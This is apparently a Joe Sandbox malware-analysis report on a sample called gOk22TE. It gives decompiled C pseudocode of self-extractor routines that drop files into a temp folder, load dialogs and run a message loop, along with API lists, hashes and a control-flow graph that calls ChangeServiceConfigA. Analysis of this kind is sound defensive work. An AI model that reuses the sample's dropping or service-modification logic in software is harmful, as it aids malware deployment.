                                                                                                                                                                                                                                                • Opcode ID: 70f6e06b495c1a31498465e69c00be9a295413983141dce4be9a480a7ec1475a
                                                                                                                                                                                                                                                • Instruction ID: 19918536b8c2bbdeadd579b83861d6b53a2ed2d64767a52f395f8c51cc3c88a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70f6e06b495c1a31498465e69c00be9a295413983141dce4be9a480a7ec1475a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4411A131600109EFDB20EF69EA0CABE7BF8EF49750F048195E992DB184DA359E11CB95
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                                			E010E63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				long _v272;
                                                                                                                                                                                                                                                				void* _v276;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t15;
                                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                                				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t15 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                                				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_v276 = _a16;
                                                                                                                                                                                                                                                				_t37 = 1;
                                                                                                                                                                                                                                                				E010E1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                                                                				E010E658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                                				_t28 = 0;
                                                                                                                                                                                                                                                				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                                					_t28 = _a4;
                                                                                                                                                                                                                                                					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                                						 *0x10e9124 = 0x80070052;
                                                                                                                                                                                                                                                						_t37 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					CloseHandle(_t39);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					 *0x10e9124 = 0x80070052;
                                                                                                                                                                                                                                                					_t37 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010E642D
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010E645B
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010E647A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010E63EB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                                • API String ID: 1065093856-256195474
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                                				intOrPtr* _t22;
                                                                                                                                                                                                                                                				void _t24;
                                                                                                                                                                                                                                                				struct HWND__* _t25;
                                                                                                                                                                                                                                                				struct HWND__* _t26;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				intOrPtr* _t28;
                                                                                                                                                                                                                                                				intOrPtr* _t33;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t33 = __ecx;
                                                                                                                                                                                                                                                				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                                				if(_t34 != 0) {
                                                                                                                                                                                                                                                					_t22 = _t33;
                                                                                                                                                                                                                                                					_t27 = _t22 + 1;
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						_t6 =  *_t22;
                                                                                                                                                                                                                                                						_t22 = _t22 + 1;
                                                                                                                                                                                                                                                					} while (_t6 != 0);
                                                                                                                                                                                                                                                					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                                					 *_t34 = _t24;
                                                                                                                                                                                                                                                					if(_t24 != 0) {
                                                                                                                                                                                                                                                						_t28 = _t33;
                                                                                                                                                                                                                                                						_t19 = _t28 + 1;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t9 =  *_t28;
                                                                                                                                                                                                                                                							_t28 = _t28 + 1;
                                                                                                                                                                                                                                                						} while (_t9 != 0);
                                                                                                                                                                                                                                                						E010E1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                                						_t11 =  *0x10e91e0; // 0xdb8f30
                                                                                                                                                                                                                                                						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                                						 *0x10e91e0 = _t34;
                                                                                                                                                                                                                                                						return 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t25 =  *0x10e8584; // 0x0
                                                                                                                                                                                                                                                					E010E44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                                					LocalFree(_t34);
                                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t26 =  *0x10e8584; // 0x0
                                                                                                                                                                                                                                                				E010E44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,010E4E6F), ref: 010E47EA
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 010E4823
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 010E4847
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010E4851
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
• Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                                • API String ID: 359063898-256195474
                                                                                                                                                                                                                                                • Opcode ID: 1959c037caceaa55f6c6784649d72a55cc0e400ca9a8f39063ecbc490c21e19f
                                                                                                                                                                                                                                                • Instruction ID: ae0e5b722709fefeb4acb3261b6cae43fb5717b90798a9eef993fb356a0b9530
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1959c037caceaa55f6c6784649d72a55cc0e400ca9a8f39063ecbc490c21e19f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B21136B5700601AFE7298E26981CF7A3BDAEBC5700F04845DE9C2CB345CA3ACC06C720
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E010E6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                				struct HRSRC__* _t6;
                                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                                				int _t24;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t23 =  *0x10e9a3c; // 0x10e0000
                                                                                                                                                                                                                                                				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                                				if(_t6 == 0) {
                                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                                					E010E44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					_t24 = _a16;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                                					if(_t21 == 0) {
                                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(_a12 != 0) {
                                                                                                                                                                                                                                                							_push(_a12);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                                						FreeResource(_t21);
                                                                                                                                                                                                                                                						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t24;
                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(010E0000,000007D6,00000005), ref: 010E652A
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(010E0000,00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010E6538
                                                                                                                                                                                                                                                • DialogBoxIndirectParamA.USER32(010E0000,00000000,00000547,010E19E0,00000000), ref: 010E6557
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010E6560
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1214682469-0
                                                                                                                                                                                                                                                • Opcode ID: f5fe3627c3c3bc1004ddc1a2f85ee6989a53240bb051367f573be9ec4632f243
                                                                                                                                                                                                                                                • Instruction ID: 44db344cbe17339d9dcf8be21b4b6f8ae91a8989624eac15e7621805995329a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5fe3627c3c3bc1004ddc1a2f85ee6989a53240bb051367f573be9ec4632f243
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A201D473300105BFDB205A5AAC08DAB7AECEB89761F010165FA9197144DA76CD1087A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E3680(void* __ecx) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				struct tagMSG _v36;
                                                                                                                                                                                                                                                				int _t8;
                                                                                                                                                                                                                                                				struct HWND__* _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_v8 = __ecx;
                                                                                                                                                                                                                                                				_t16 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                                					if(_t8 == 0) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                                								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t16 = 1;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                                						} while (_t8 != 0);
                                                                                                                                                                                                                                                						if(_t16 == 0) {
                                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t8;
                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010E369F
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36B2
                                                                                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 010E36CB
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36DA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2776232527-0
                                                                                                                                                                                                                                                • Opcode ID: c5a1ffd1cfa5568750c9fe66f05118bff92d0387fae048301d28ea3e338fdf99
                                                                                                                                                                                                                                                • Instruction ID: d540ed2cb228577ffec65b8c72fe2e0a214c89ae4ff836a7235ec16d08be670f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5a1ffd1cfa5568750c9fe66f05118bff92d0387fae048301d28ea3e338fdf99
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9017176A00214ABDB304AAB5C4CEABBFFCEBC9F10F004199BA45EB184D565C540CA60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                                			E010E65E8(char* __ecx) {
                                                                                                                                                                                                                                                				char _t3;
                                                                                                                                                                                                                                                				char _t10;
                                                                                                                                                                                                                                                				char* _t12;
                                                                                                                                                                                                                                                				char* _t14;
                                                                                                                                                                                                                                                				char* _t15;
                                                                                                                                                                                                                                                				CHAR* _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t12 = __ecx;
                                                                                                                                                                                                                                                				_t15 = __ecx;
                                                                                                                                                                                                                                                				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                                				_t10 = 0;
                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                					_t3 =  *_t12;
                                                                                                                                                                                                                                                					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                                				} while (_t3 != 0);
                                                                                                                                                                                                                                                				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                                					if(_t16 <= _t15) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                                						L7:
                                                                                                                                                                                                                                                						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                                							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *_t16 = _t10;
                                                                                                                                                                                                                                                						_t10 = 1;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_push(_t16);
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					return _t10;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L11;
                                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,010E2B33), ref: 010E6602
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 010E6612
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 010E6629
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 010E6635
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3260447230-0
                                                                                                                                                                                                                                                • Opcode ID: d8a2cd59008d77eaefa2e0953e6bbcfbdb9f8b42c9ad25808f2a85d1c3fab5c7
                                                                                                                                                                                                                                                • Instruction ID: 57f11d350ae75b048ca88217acc0318f45caee9f11807e2f91d7ff4f4e32250c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8a2cd59008d77eaefa2e0953e6bbcfbdb9f8b42c9ad25808f2a85d1c3fab5c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACF0F432205150AEE7330A2FAC8C8BBBFDCDB9F594F1941EFE8D587101D61B49068B61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E69B0() {
                                                                                                                                                                                                                                                				intOrPtr* _t4;
                                                                                                                                                                                                                                                				intOrPtr* _t5;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				intOrPtr _t11;
                                                                                                                                                                                                                                                				intOrPtr _t12;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				 *0x10e81f8 = E010E6C70();
                                                                                                                                                                                                                                                				__set_app_type(E010E6FBE(2));
                                                                                                                                                                                                                                                				 *0x10e88a4 =  *0x10e88a4 | 0xffffffff;
                                                                                                                                                                                                                                                				 *0x10e88a8 =  *0x10e88a8 | 0xffffffff;
                                                                                                                                                                                                                                                				_t4 = __p__fmode();
                                                                                                                                                                                                                                                				_t11 =  *0x10e8528; // 0x0
                                                                                                                                                                                                                                                				 *_t4 = _t11;
                                                                                                                                                                                                                                                				_t5 = __p__commode();
                                                                                                                                                                                                                                                				_t12 =  *0x10e851c; // 0x0
                                                                                                                                                                                                                                                				 *_t5 = _t12;
                                                                                                                                                                                                                                                				_t6 = E010E7000();
                                                                                                                                                                                                                                                				if( *0x10e8000 == 0) {
                                                                                                                                                                                                                                                					__setusermatherr(E010E7000);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E010E71EF(_t6);
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 010E6FC5
                                                                                                                                                                                                                                                • __set_app_type.MSVCRT ref: 010E69C2
                                                                                                                                                                                                                                                • __p__fmode.MSVCRT ref: 010E69D8
                                                                                                                                                                                                                                                • __p__commode.MSVCRT ref: 010E69E6
                                                                                                                                                                                                                                                • __setusermatherr.MSVCRT ref: 010E6A07
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1632413811-0
                                                                                                                                                                                                                                                • Opcode ID: a4779e4dab892187234cf3fe03e87d4cacdf896e136f6932e7c3d599e8fad097
                                                                                                                                                                                                                                                • Instruction ID: 7c6d10c152326dcdace8bd71c8d3d99b823a3a198dd28e055e05585cd4c5c624
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4779e4dab892187234cf3fe03e87d4cacdf896e136f6932e7c3d599e8fad097
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFF0DA74A04311CFC6786B3BF60D6043BE2EB18B21B10464AE4E19E2D8CF3F81408B10
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Callgraph


                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 17 7ffbace21b10-7ffbace21b17 18 7ffbace21b22-7ffbace21b33 17->18 19 7ffbace21b19-7ffbace21b21 17->19 21 7ffbace21b34-7ffbace21b5d 18->21 19->18 21->21 22 7ffbace21b5f-7ffbace21bd8 21->22 25 7ffbace21c36-7ffbace21c68 22->25 26 7ffbace21bda-7ffbace21be9 22->26 31 7ffbace21cc7-7ffbace21d00 25->31 32 7ffbace21c6a-7ffbace21c7a 25->32 26->25 27 7ffbace21beb-7ffbace21bee 26->27 29 7ffbace21bf0-7ffbace21c03 27->29 30 7ffbace21c28-7ffbace21c30 27->30 33 7ffbace21c05 29->33 34 7ffbace21c07-7ffbace21c1a 29->34 30->25 40 7ffbace21d5e-7ffbace21d97 31->40 41 7ffbace21d02-7ffbace21d11 31->41 32->31 36 7ffbace21c7c-7ffbace21c7f 32->36 33->34 34->34 35 7ffbace21c1c-7ffbace21c24 34->35 35->30 37 7ffbace21c81-7ffbace21c94 36->37 38 7ffbace21cb9-7ffbace21cc1 36->38 42 7ffbace21c96 37->42 43 7ffbace21c98-7ffbace21cab 37->43 38->31 51 7ffbace21df6-7ffbace21e2f 40->51 52 7ffbace21d99-7ffbace21da9 40->52 41->40 44 7ffbace21d13-7ffbace21d16 41->44 42->43 43->43 45 7ffbace21cad-7ffbace21cb5 43->45 46 7ffbace21d50-7ffbace21d58 44->46 47 7ffbace21d18-7ffbace21d2b 44->47 45->38 46->40 49 7ffbace21d2d 47->49 50 7ffbace21d2f-7ffbace21d42 47->50 49->50 50->50 53 7ffbace21d44-7ffbace21d4c 50->53 58 7ffbace21e8e-7ffbace21ec7 51->58 59 7ffbace21e31-7ffbace21e41 51->59 52->51 54 7ffbace21dab-7ffbace21dae 52->54 53->46 56 7ffbace21db0-7ffbace21dc3 54->56 57 7ffbace21de8-7ffbace21df0 54->57 60 7ffbace21dc5 56->60 61 7ffbace21dc7-7ffbace21dda 56->61 57->51 69 7ffbace21f26-7ffbace21fe2 ChangeServiceConfigA 58->69 70 7ffbace21ec9-7ffbace21ed9 58->70 59->58 62 7ffbace21e43-7ffbace21e46 59->62 60->61 61->61 63 7ffbace21ddc-7ffbace21de4 61->63 64 7ffbace21e80-7ffbace21e88 62->64 65 7ffbace21e48-7ffbace21e5b 62->65 63->57 64->58 67 7ffbace21e5d 65->67 68 
7ffbace21e5f-7ffbace21e72 65->68 67->68 68->68 71 7ffbace21e74-7ffbace21e7c 68->71 78 7ffbace21fe4 69->78 79 7ffbace21fea-7ffbace21ff9 69->79 70->69 72 7ffbace21edb-7ffbace21ede 70->72 71->64 73 7ffbace21ee0-7ffbace21ef3 72->73 74 7ffbace21f18-7ffbace21f20 72->74 76 7ffbace21ef5 73->76 77 7ffbace21ef7-7ffbace21f0a 73->77 74->69 76->77 77->77 80 7ffbace21f0c-7ffbace21f14 77->80 78->79 81 7ffbace21ffc call 7ffbace22049 79->81 80->74 83 7ffbace22001-7ffbace22025 81->83 83->81 84 7ffbace22027-7ffbace2202d 83->84 85 7ffbace2202f 84->85 86 7ffbace22034-7ffbace22048 84->86 85->86
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
